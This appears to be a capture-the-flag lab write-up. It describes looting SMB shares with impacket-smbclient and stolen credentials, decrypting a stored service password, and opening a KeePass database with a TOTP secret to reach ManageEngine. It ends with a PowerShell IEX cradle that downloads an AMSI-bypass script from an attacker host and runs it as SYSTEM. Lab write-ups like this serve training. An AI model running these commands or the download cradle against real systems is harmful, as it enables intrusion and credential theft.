Malleum Knowledge Base

172.16.21.195

1 min read

From the network of 172.16.20.180 we saw share accessible on this machine.

Share Access Authenticated

proxychains impacket-smbclient wendy.vincent:Summer2023@172.16.21.195


use install$

mget *

install$

use it

cd vault

mget svc.kdbx

it/vault/

use manageengine

mget config.xml

manageengine

use homes

cd Amy.ball

cat flag.txt.txt

homes/amy.ball

VL{3387261d92644002942061cfea267da2}

Decrypt the Secure pass file

  • Watch the video part 3.
  • 8623050922ab890bbd2f79886cd6809f (key)
  • 81274145f4a5857b839ee7b500f1d66e (IV)
  • 8a044d12211781b515e7bae67bb7abce (pass)

AES Decrypt

  • Password = jYEp9bq32KFLVL!
  • Username = svc_me

Keepass

  • we found a kdbx file of version 4
  • we can try to use this password to open the database file.
  • otpauth://totp/manage%20engine%20admin%20totp:admin?secret=CXXDI3PTAWF52Z7L&period=30&digits=6&issuer=manage%20engine%20admin%20totp

Manage engine login with the available info on port 8383

User Currently Logged on : **carly.adams**

Actions and Powershell

Run as system

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"

172.16.21.140

Run as carly.adams as well just in case

Graph View